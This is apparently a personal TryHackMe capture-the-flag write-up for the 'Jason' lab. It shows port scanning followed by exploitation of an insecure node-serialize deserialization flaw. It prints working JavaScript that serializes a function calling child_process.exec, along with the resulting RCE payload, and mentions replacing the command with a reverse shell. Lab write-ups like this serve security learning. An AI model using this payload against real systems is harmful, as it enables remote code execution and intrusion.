Jason

Lab Setup

mkdir ~/Documents/TryHackMe/eJPT/Jason
cd ~/Documents/TryHackMe/eJPT/Jason
mkdir recon enumeration notes 
touch notes/{README.md,vulns,creds}


export IP=10.10.204.167

Enumeration

First scan the machine for open ports using rustscan and nmap.

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

I found only ssh and http ports, so let’s enumerate http port. After some minutes of fuzzing I found nothing so I go to website and see request/respons headers.

For every post that you do on the website it will do a session cookie. Whatever we pass as email seems to be getting serialized and then deserialized and posted to the page.

Exploitation

I find some explanation of how to exploit this.

First I try to see if I can execute commands using a simple ping command. This code needs to be serialized.

var y = {
 rce : function(){
 require('child_process').exec('ping -c 3 10.8.113.25', function(error, stdout, stderr) { console.log(stdout) });
 },
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));

node script.js
Serialized: 
{"rce":"_$$ND_FUNC$$_function(){\n require('child_process').exec('ping -c 3 10.8.113.25', function(error, stdout, stderr) { console.log(stdout) });\n }"}

You also need to change rce with email. After this I change the command with a reverse shell.